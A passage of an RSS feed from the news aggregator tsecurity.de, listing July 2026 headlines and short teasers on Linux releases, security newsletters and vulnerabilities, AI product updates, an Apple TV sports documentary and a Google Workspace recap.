News: Haiku ports the NetBSD Virtual Machine Monitor, GNOME OS makes it easier to test experimental features, FreeBSD removes the last of ...]]></description>
<link>https://tsecurity.de/de/3680152/unix-server/distrowatch-weekly-issue-1182/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680152/unix-server/distrowatch-weekly-issue-1182/</guid>
<pubDate>Mon, 20 Jul 2026 02:31:02 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  This week in DistroWatch Weekly: <br>
Review: Smaller, community-oriented, open source solutions<br>
News: Haiku ports the NetBSD Virtual Machine Monitor, GNOME OS makes it easier to test experimental features, FreeBSD removes the last of the GPL code from its base<br>
Questions and answers: Installing software when the root filesystem is full<br>
Released....]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Weekly Summary 29]]></title>
<description><![CDATA[210 posts were published in the last hour 21:55 : IT Security News Daily Summary 2026-07-19 21:40 : Critical NGINX Vulnerability Can Crash Workers and May Allow Remote Code Execution 16:34 : Connecting AI agents to outside services explodes the…
Read more →
The post IT Security News Weekly Summar...]]></description>
<link>https://tsecurity.de/de/3680059/it-security-nachrichten/it-security-news-weekly-summary-29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680059/it-security-nachrichten/it-security-news-weekly-summary-29/</guid>
<pubDate>Mon, 20 Jul 2026 00:22:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>210 posts were published in the last hour 21:55 : IT Security News Daily Summary 2026-07-19 21:40 : Critical NGINX Vulnerability Can Crash Workers and May Allow Remote Code Execution 16:34 : Connecting AI agents to outside services explodes the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-weekly-summary-29-2/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-weekly-summary-29-2/">IT Security News Weekly Summary 29</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[IT Security News Hourly Summary 2026-07-20 00h : 3 posts]]></title>
<description><![CDATA[3 posts were published in the last hour 21:58 : IT Security News Weekly Summary 29 21:55 : IT Security News Daily Summary 2026-07-19 21:40 : Critical NGINX Vulnerability Can Crash Workers and May Allow Remote Code Execution
Read more →
The post IT Security News Hourly Summary 2026-07-20 00h : 3 p...]]></description>
<link>https://tsecurity.de/de/3680058/it-security-nachrichten/it-security-news-hourly-summary-2026-07-20-00h-3-posts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3680058/it-security-nachrichten/it-security-news-hourly-summary-2026-07-20-00h-3-posts/</guid>
<pubDate>Mon, 20 Jul 2026 00:22:55 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>3 posts were published in the last hour 21:58 : IT Security News Weekly Summary 29 21:55 : IT Security News Daily Summary 2026-07-19 21:40 : Critical NGINX Vulnerability Can Crash Workers and May Allow Remote Code Execution</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-20-00h-3-posts/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/it-security-news-hourly-summary-2026-07-20-00h-3-posts/">IT Security News Hourly Summary 2026-07-20 00h : 3 posts</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Sunday Reboot: Shrinking models and an on-device AI future]]></title>
<description><![CDATA[In this week's Sunday Reboot, Apple's AI model-shrinking talk could have massive benefits, with a chance of also being a billion-dollar deal if it plays its cards right.On-device AI processing will be a big thing in the coming years if Apple bets right. Sunday Reboot is a weekly column covering s...]]></description>
<link>https://tsecurity.de/de/3679941/ios-mac-os/sunday-reboot-shrinking-models-and-an-on-device-ai-future/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679941/ios-mac-os/sunday-reboot-shrinking-models-and-an-on-device-ai-future/</guid>
<pubDate>Sun, 19 Jul 2026 22:24:00 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[In this week's <em>Sunday Reboot</em>, Apple's AI model-shrinking talk could have massive benefits, with a chance of also being a billion-dollar deal if it plays its cards right.<br><br><div><img src="https://photos5.appleinsider.com/gallery/68289-143946-57996-118130-000-lede-Siri-2-xl-xl.jpg" alt="Close-up of a modern smartphone in the dark, screen showing a colorful glowing Siri-style voice assistant logo near the top edge with visible side buttons" height="738"><br><span>On-device AI processing will be a big thing in the coming years if Apple bets right. </span></div><br><em>Sunday Reboot</em> is a weekly column covering some of the lighter stories within the Apple reality distortion field from the past seven days. All to get the next week underway with a good first step.<br><br><br> <a href="https://appleinsider.com/articles/26/07/19/sunday-reboot-shrinking-models-and-an-on-device-ai-future?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244995?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Cyber Security Newsletter Bulletin – EY Breach, Wpzshell Exploit, Notepad++ Flaws +20 Stories]]></title>
<description><![CDATA[This week’s cybersecurity situation shows a clear reality: every part of technology, from identity systems to common productivity tools, can be hacked or compromised. Microsoft’s July Patch Tuesday alone addressed roughly 570 vulnerabilities, including two zero-days already being exploited in…
Re...]]></description>
<link>https://tsecurity.de/de/3679755/it-security-nachrichten/weekly-cyber-security-newsletter-bulletin-ey-breach-wpzshell-exploit-notepad-flaws-20-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679755/it-security-nachrichten/weekly-cyber-security-newsletter-bulletin-ey-breach-wpzshell-exploit-notepad-flaws-20-stories/</guid>
<pubDate>Sun, 19 Jul 2026 18:27:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week’s cybersecurity situation shows a clear reality: every part of technology, from identity systems to common productivity tools, can be hacked or compromised. Microsoft’s July Patch Tuesday alone addressed roughly 570 vulnerabilities, including two zero-days already being exploited in…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/weekly-cyber-security-newsletter-bulletin-ey-breach-wpzshell-exploit-notepad-flaws-20-stories/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/weekly-cyber-security-newsletter-bulletin-ey-breach-wpzshell-exploit-notepad-flaws-20-stories/">Weekly Cyber Security Newsletter Bulletin – EY Breach, Wpzshell Exploit, Notepad++ Flaws +20 Stories</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Affairs newsletter Round 586 by Pierluigi Paganini – INTERNATIONAL EDITION]]></title>
<description><![CDATA[A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. OpenSSL Fixes HollowByte Memory Exhaustion Bug...]]></description>
<link>https://tsecurity.de/de/3679693/hacking/security-affairs-newsletter-round-586-by-pierluigi-paganini-international-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679693/hacking/security-affairs-newsletter-round-586-by-pierluigi-paganini-international-edition/</guid>
<pubDate>Sun, 19 Jul 2026 17:37:53 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. OpenSSL Fixes HollowByte Memory Exhaustion Bug Daxin: 13-Year-Old China-Linked Malware Found Still Active on Manufacturer’s Network […]]]></content:encoded>
</item>
<item>
<title><![CDATA[SECURITY AFFAIRS MALWARE NEWSLETTER ROUND 106]]></title>
<description><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter CrashStealer: C++ macOS infostealer posing as crash reporter Lucide Proxy: Turning Student Web Proxies into DDoS Bots       AsyncAPI npm organiz...]]></description>
<link>https://tsecurity.de/de/3679692/hacking/security-affairs-malware-newsletter-round-106/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679692/hacking/security-affairs-malware-newsletter-round-106/</guid>
<pubDate>Sun, 19 Jul 2026 17:37:52 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security Affairs Malware newsletter includes a collection of the best articles and research on malware in the international landscape Malware Newsletter CrashStealer: C++ macOS infostealer posing as crash reporter Lucide Proxy: Turning Student Web Proxies into DDoS Bots       AsyncAPI npm organization compromised, 2M weekly downloads affected   OkoBot: new sophisticated malware framework targets cryptocurrency users  […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security Affairs newsletter Round 586 by Pierluigi Paganini – INTERNATIONAL EDITION]]></title>
<description><![CDATA[A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. OpenSSL…
Read more →
The post Security Affairs...]]></description>
<link>https://tsecurity.de/de/3679689/it-security-nachrichten/security-affairs-newsletter-round-586-by-pierluigi-paganini-international-edition/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679689/it-security-nachrichten/security-affairs-newsletter-round-586-by-pierluigi-paganini-international-edition/</guid>
<pubDate>Sun, 19 Jul 2026 17:37:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new round of the weekly Security Affairs newsletter has arrived! Every week, the best security articles from Security Affairs are free in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. OpenSSL…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/security-affairs-newsletter-round-586-by-pierluigi-paganini-international-edition/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/security-affairs-newsletter-round-586-by-pierluigi-paganini-international-edition/">Security Affairs newsletter Round 586 by Pierluigi Paganini – INTERNATIONAL EDITION</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Week in Review: Most popular stories on GeekWire for the week of July 12, 2026]]></title>
<description><![CDATA[See the technology stories that people were reading on GeekWire for the week of July 12, 2026. Read More]]></description>
<link>https://tsecurity.de/de/3679686/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-july-12-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679686/it-nachrichten/week-in-review-most-popular-stories-on-geekwire-for-the-week-of-july-12-2026/</guid>
<pubDate>Sun, 19 Jul 2026 17:32:13 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img width="1200" height="630" src="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png" class="webfeedsFeaturedVisual wp-post-image" alt="GeekWire Week in Review" decoding="async" srcset="https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1.png 1200w, https://cdn.geekwire.com/wp-content/uploads/2015/11/geekwire-week-in-review1-620x326.png 620w" sizes="(max-width: 1200px) 100vw, 1200px" loading="lazy"><br>See the technology stories that people were reading on GeekWire for the week of July 12, 2026. <a href="https://www.geekwire.com/2026/geekwire-weekly-roundup-2026-07-12/">Read More</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Weekly Cyber Security Newsletter Bulletin – EY Breach, Wpzshell Exploit, Notepad++ Flaws +20 Stories]]></title>
<description><![CDATA[This week’s cybersecurity situation shows a clear reality: every part of technology, from identity systems to common productivity tools, can be hacked or compromised. Microsoft’s July Patch Tuesday alone addressed roughly 570 vulnerabilities, including two zero-days already being exploited in the...]]></description>
<link>https://tsecurity.de/de/3679675/it-security-nachrichten/weekly-cyber-security-newsletter-bulletin-ey-breach-wpzshell-exploit-notepad-flaws-20-stories/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679675/it-security-nachrichten/weekly-cyber-security-newsletter-bulletin-ey-breach-wpzshell-exploit-notepad-flaws-20-stories/</guid>
<pubDate>Sun, 19 Jul 2026 17:23:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This week’s cybersecurity situation shows a clear reality: every part of technology, from identity systems to common productivity tools, can be hacked or compromised. Microsoft’s July Patch Tuesday alone addressed roughly 570 vulnerabilities, including two zero-days already being exploited in the wild against SharePoint Server and Active Directory Federation Services, signaling that attackers are moving […]</p>
<p>The post <a href="https://cybersecuritynews.com/weekly-cyber-security-newsletter-bulletin/">Weekly Cyber Security Newsletter Bulletin – EY Breach, Wpzshell Exploit, Notepad++ Flaws +20 Stories</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The future of physical games is not looking great]]></title>
<description><![CDATA[This is The Stepback, a weekly newsletter breaking down one essential story from the tech world. For more on video games and physical media, follow Jay Peters. The Stepback arrives in our subscribers' inboxes on Sunday at 8AM ET. Opt in for The Stepback here. How it started As a kid, I relished t...]]></description>
<link>https://tsecurity.de/de/3679421/it-nachrichten/the-future-of-physical-games-is-not-looking-great/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679421/it-nachrichten/the-future-of-physical-games-is-not-looking-great/</guid>
<pubDate>Sun, 19 Jul 2026 14:02:43 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This is The Stepback, a weekly newsletter breaking down one essential story from the tech world. For more on video games and physical media, follow Jay Peters. The Stepback arrives in our subscribers' inboxes on Sunday at 8AM ET. Opt in for The Stepback here. How it started As a kid, I relished trips to […]]]></content:encoded>
</item>
<item>
<title><![CDATA[SearchLeak: Ein Patch löst das strukturelle Problem nicht | Computer Weekly]]></title>
<description><![CDATA[KI-Tools in Unternehmen, die als Erweiterung der Benutzersitzung agieren, sind ein erhebliches Sicherheitsrisiko. Die Schwachstelle SearchLeak ...]]></description>
<link>https://tsecurity.de/de/3679014/it-security-nachrichten/searchleak-ein-patch-loest-das-strukturelle-problem-nicht-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3679014/it-security-nachrichten/searchleak-ein-patch-loest-das-strukturelle-problem-nicht-computer-weekly/</guid>
<pubDate>Sun, 19 Jul 2026 08:51:33 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[KI-Tools in Unternehmen, die als Erweiterung der Benutzersitzung agieren, sind ein erhebliches Sicherheitsrisiko. Die Schwachstelle SearchLeak ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple TV unveils first trailer for ‘The Dynasty: UConn Huskies’]]></title>
<description><![CDATA[Apple TV has released the first trailer for “The Dynasty: UConn Huskies,” an upcoming sports documentary series about the historic rise of the University of Connecticut women’s basketball program. 



The preview brings together championship footage, private locker-room moments, archival clips an...]]></description>
<link>https://tsecurity.de/de/3678350/ios-mac-os/apple-tv-unveils-first-trailer-for-the-dynasty-uconn-huskies/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678350/ios-mac-os/apple-tv-unveils-first-trailer-for-the-dynasty-uconn-huskies/</guid>
<pubDate>Sat, 18 Jul 2026 19:54:23 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple TV has released the first trailer for “The Dynasty: UConn Huskies,” an upcoming sports documentary series about the historic rise of the University of Connecticut women’s basketball program. 



The preview brings together championship footage, private locker-room moments, archival clips and interviews with some of the biggest players in UConn history.




https://www.youtube.com/watch?v=qygK7CQUe_o





Number of episodes: Three



Genre: Sports documentary



Release date: August 21, 2026



Finish date: August 21, 2026, as Apple currently lists the project as a three-part documentary event with one global premiere date



Streaming platform: Apple TV



Directors: Matthew Hamachek and Erica Sashin




What is The Dynasty: UConn Huskies about?



“The Dynasty: UConn Huskies” follows the women’s basketball program across 40 years under Hall of Fame head coach Geno Auriemma. It explores how a team that was once overlooked developed into one of the most successful programs in college basketball history.



The series also looks at the pressure that comes with maintaining such a high standard year after year. Through unseen archival footage and access to players, coaches and former stars, viewers will see the work, discipline and expectations behind UConn’s championship culture.



The trailer includes appearances from members of the 2025 National Championship team, including Paige Bueckers, Azzi Fudd, Sarah Strong, KK Arnold and Jana El Alfy. Several UConn legends also feature in the series, including Sue Bird, Diana Taurasi, Maya Moore, Breanna Stewart, Rebecca Lobo and Swin Cash.



UConn entered the 2024-25 season carrying decades of expectations before winning its 12th national championship. The documentary connects that victory with earlier generations that helped build the program’s reputation.



FAQs



When does The Dynasty: UConn Huskies premiere?



“The Dynasty: UConn Huskies” premieres globally on Apple TV on Friday, August 21, 2026.



How many episodes are in The Dynasty: UConn Huskies?



The documentary series consists of three episodes covering the rise and continued success of UConn women’s basketball.



Will all episodes arrive on the same day?



Apple describes the series as a three-part documentary event and currently lists August 21 as its global premiere date. A separate weekly release schedule has not been announced.



Who appears in The Dynasty: UConn Huskies?



The series features interviews with current and former UConn players, including Paige Bueckers, Azzi Fudd, Sue Bird, Diana Taurasi, Maya Moore, Breanna Stewart, Sarah Strong and Rebecca Lobo.



Who directed the documentary?



Matthew Hamachek and Erica Sashin directed the three-part documentary series. Hamachek previously worked on major sports documentaries, while Sashin has directed and produced several nonfiction projects.



Is The Dynasty: UConn Huskies based on the men’s or women’s team?



The series focuses on the UConn women’s basketball team and its four-decade journey under coach Geno Auriemma.



“The Dynasty: UConn Huskies” will stream exclusively on Apple TV from August 21. Apple TV costs $12.99 per month in the United States and includes a seven-day free trial for eligible new subscribers. Are you planning to watch the UConn documentary when it arrives? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Cyberangriffe der KW29/2026 im Überblick - Computer Weekly]]></title>
<description><![CDATA[... Cybersicherheit zu beantragen. Der Bürgermeister von Ghidfalău präzisierte, dass keine sensiblen Daten auf der Plattform gespeichert sind. Die ...]]></description>
<link>https://tsecurity.de/de/3678344/it-security-nachrichten/die-cyberangriffe-der-kw292026-im-ueberblick-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678344/it-security-nachrichten/die-cyberangriffe-der-kw292026-im-ueberblick-computer-weekly/</guid>
<pubDate>Sat, 18 Jul 2026 19:53:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... <b>Cybersicherheit</b> zu beantragen. Der Bürgermeister von Ghidfalău präzisierte, dass keine sensiblen Daten auf der Plattform gespeichert sind. Die ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Die Cyberangriffe der KW29/2026 im Überblick - Computer Weekly]]></title>
<description><![CDATA[Security Alle anschauen. Anwendungs- und Plattformsicherheit · Bedrohungen ... Beeinträchtigt sind seine IT-Systeme, Dienste, das Internet und die E- ...]]></description>
<link>https://tsecurity.de/de/3678248/it-security-nachrichten/die-cyberangriffe-der-kw292026-im-ueberblick-computer-weekly/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678248/it-security-nachrichten/die-cyberangriffe-der-kw292026-im-ueberblick-computer-weekly/</guid>
<pubDate>Sat, 18 Jul 2026 18:40:47 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<b>Security</b> Alle anschauen. Anwendungs- und Plattformsicherheit · Bedrohungen ... Beeinträchtigt sind seine <b>IT</b>-Systeme, Dienste, das Internet und die E- ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Voting Works Like Authentication]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:5 The voting process described uses identity verification, authorization checks, machine scanning, voter confirmation, and stored paper records.

Security is not only about preventing digital attacks. Physical processes also rely on...]]></description>
<link>https://tsecurity.de/de/3678157/it-security-video/voting-works-like-authentication/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678157/it-security-video/voting-works-like-authentication/</guid>
<pubDate>Sat, 18 Jul 2026 16:47:51 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:5 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/qKYmkvLQYpc?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>The voting process described uses identity verification, authorization checks, machine scanning, voter confirmation, and stored paper records.<br />
<br />
Security is not only about preventing digital attacks. Physical processes also rely on layered controls to verify who can participate and preserve records for later review.<br />
<br />
What lessons from cybersecurity can be applied to improve trust in physical systems?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#ElectionSecurity #Authentication #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[KDnuggets Weekly Roundup: Week of July 13, 2026]]></title>
<description><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead • 5 Real-World SQL Projects to Build Your Data Portfolio • 10 YouTube Channels Keeping You Ahead in AI • Structured Language Model Generation with Outlines]]></description>
<link>https://tsecurity.de/de/3678054/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-13-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678054/ai-nachrichten/kdnuggets-weekly-roundup-week-of-july-13-2026/</guid>
<pubDate>Sat, 18 Jul 2026 15:20:10 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stop Using If-Else Chains: Use the Registry Pattern in Python Instead • 5 Real-World SQL Projects to Build Your Data Portfolio • 10 YouTube Channels Keeping You Ahead in AI • Structured Language Model Generation with Outlines]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Becomes The Supply Chain]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 AI tools are increasingly being used to recommend code, libraries, and scripts. The clip explores the possibility that a compromised AI system could influence those recommendations.

Software supply chains already depend on trust ...]]></description>
<link>https://tsecurity.de/de/3677102/it-security-video/ai-becomes-the-supply-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677102/it-security-video/ai-becomes-the-supply-chain/</guid>
<pubDate>Sat, 18 Jul 2026 00:01:45 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/gZ5u3C6gB3s?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>AI tools are increasingly being used to recommend code, libraries, and scripts. The clip explores the possibility that a compromised AI system could influence those recommendations.<br />
<br />
Software supply chains already depend on trust between developers, tools, and dependencies. Adding AI as a decision-maker creates another layer that may require security review and validation.<br />
<br />
How should developers balance AI productivity gains with the need to verify what AI recommends?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#AISecurity #SoftwareSupplyChain #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in perl-DBI (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3677073/unix-server/security-mehrere-probleme-in-perl-dbi-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677073/unix-server/security-mehrere-probleme-in-perl-dbi-fedora/</guid>
<pubDate>Fri, 17 Jul 2026 23:31:07 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Denial of Service in perl-HTTP-Date (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3677071/unix-server/security-denial-of-service-in-perl-http-date-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677071/unix-server/security-denial-of-service-in-perl-http-date-fedora/</guid>
<pubDate>Fri, 17 Jul 2026 23:31:04 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[M. Thénardier, LastPass, GitHub, EBS, Spirals, Pegasus, Shaft, Josh Marpet, and More - SWN #599]]></title>
<description><![CDATA[M. Thénardier, LastPass, GitHub, EBS, Spirals, Pegasus, Shaft, Josh Marpet, and More on this episode of the Security Weekly News. Visit https://www.securityweekly.com/swn for all the latest episodes! Show Notes: https://securityweekly.com/swn-599]]></description>
<link>https://tsecurity.de/de/3677054/it-security-nachrichten/m-thnardier-lastpass-github-ebs-spirals-pegasus-shaft-josh-marpet-and-more-swn-599/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677054/it-security-nachrichten/m-thnardier-lastpass-github-ebs-spirals-pegasus-shaft-josh-marpet-and-more-swn-599/</guid>
<pubDate>Fri, 17 Jul 2026 23:20:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>M. Thénardier, LastPass, GitHub, EBS, Spirals, Pegasus, Shaft, Josh Marpet, and More on this episode of the Security Weekly News.</p> <p>Visit <a rel="noopener" target="_blank" href="https://www.securityweekly.com/swn">https://www.securityweekly.com/swn</a> for all the latest episodes!</p> <p>Show Notes: <a rel="noopener" target="_blank" href="https://securityweekly.com/swn-599">https://securityweekly.com/swn-599</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Workspace Weekly Recap - July 17, 2026]]></title>
<description><![CDATA[Google Credential Provider for Windows (GCPW) now supports FIDO2-compliant physical security keys as a second factor for authenticationGoogle Credential Provider for Windows (GCPW) has been updated to support FIDO2-compliant physical security keys as a second factor for authentication. This updat...]]></description>
<link>https://tsecurity.de/de/3677046/web-tipps/google-workspace-weekly-recap-july-17-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677046/web-tipps/google-workspace-weekly-recap-july-17-2026/</guid>
<pubDate>Fri, 17 Jul 2026 23:11:52 +0200</pubDate>
<category>Web Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Google Credential Provider for Windows (GCPW) now supports FIDO2-compliant physical security keys as a second factor for authentication</h3><p>Google Credential Provider for Windows (GCPW) has been updated to support FIDO2-compliant physical security keys as a second factor for authentication. This update helps organizations improve their security posture by enabling administrators to enforce 2-Step Verification (2SV) using hardware security keys at the Windows login screen. | <a href="https://workspaceupdates.googleblog.com/2026/07/google-credential-provider-for-windows-now-supports-FIDO2-compliant-physical-security-keys-as-a-second-factor-for-authentication.html" target="_blank">Learn more</a>.</p><h3>Improvement to in-room problem reporting for Google Meet hardware</h3><p>Maintaining an enterprise-grade video conferencing environment requires visibility into the health of its devices. We're introducing new ways to see Google Meet hardware user-reported feedback directly in the Admin console. | <a href="https://workspaceupdates.googleblog.com/2026/07/improvement-to-in-room-problem-reporting-for-Google-Meet-hardware.html" target="_blank">Learn more</a>.</p><h3>New refinement capabilities allow custom editing with Help me write in Gmail</h3><p>Users can now edit and revise their email drafts in Gmail via the prompt bar, using custom refine instructions in Help me write. Previously the refines were limited to preset options like Polish, Formalize, and Shorten. | <a href="https://workspaceupdates.googleblog.com/2026/07/new-refinement-capabilities-allow-custom-editing-with-Help-me-write-in-Gmail.html" target="_blank">Learn more</a>.</p><h3>Now available: group conversations with external collaborators in Google Chat</h3><p>For many teams, it’s essential to be able to work in real-time with partners from outside your organization. We’re improving external collaboration in Google Chat by making it possible to create group conversations that include external users. | <a href="https://workspaceupdates.googleblog.com/2026/07/now-available-group-conversations-with-external-collaborators-in-Google-Chat.html" target="_blank">Learn more</a>.</p><h3>NotebookLM is now Gemini Notebook</h3><p>We’re renaming NotebookLM to Gemini Notebook. While it remains a standalone product focused on being your premier research tool, the new name reflects how it will evolve to do more across the Google ecosystem. | <a href="https://workspaceupdates.googleblog.com/2026/07/notebooklm-now-gemini-notebook.html" target="_blank">Learn more</a>.</p><h3>Easily control the emotions and pacing of AI avatars and AI voiceovers in Google Vids</h3><p>Users can now easily steer voiceover and avatar speaking in Google Vids by typing content within brackets like “[excitedly]”. | <a href="https://workspaceupdates.googleblog.com/2026/06/easily-steer-ai-voiceover-and-avatar-speaking-with-emotions-pacing-and-sound-effects.html" target="_blank">Learn more</a>.</p><h3>Expanded language support for Gemini in Google Docs</h3><p>We are now expanding support for these features to 11 more languages, including Mandarin, Dutch, Malay, Hebrew, Polish, Turkish, Czech, Indonesian, Swedish, Danish, and Norwegian. These new additions join our previously supported languages: English, Spanish, Portuguese, Japanese, French, Korean, German, and Italian. | <a href="https://workspaceupdates.googleblog.com/2026/07/expanded-language-support-for-gemini-in-Google-Docs.html" target="_blank">Learn more</a>.</p><h3>Generate higher quality AI video clips and edit any video with Gemini Omni in Vids</h3><p>Users now have access to Gemini Omni directly within Google Vids. Omni provides higher quality video generation with significant improvements over previous models. Additionally, Omni’s world 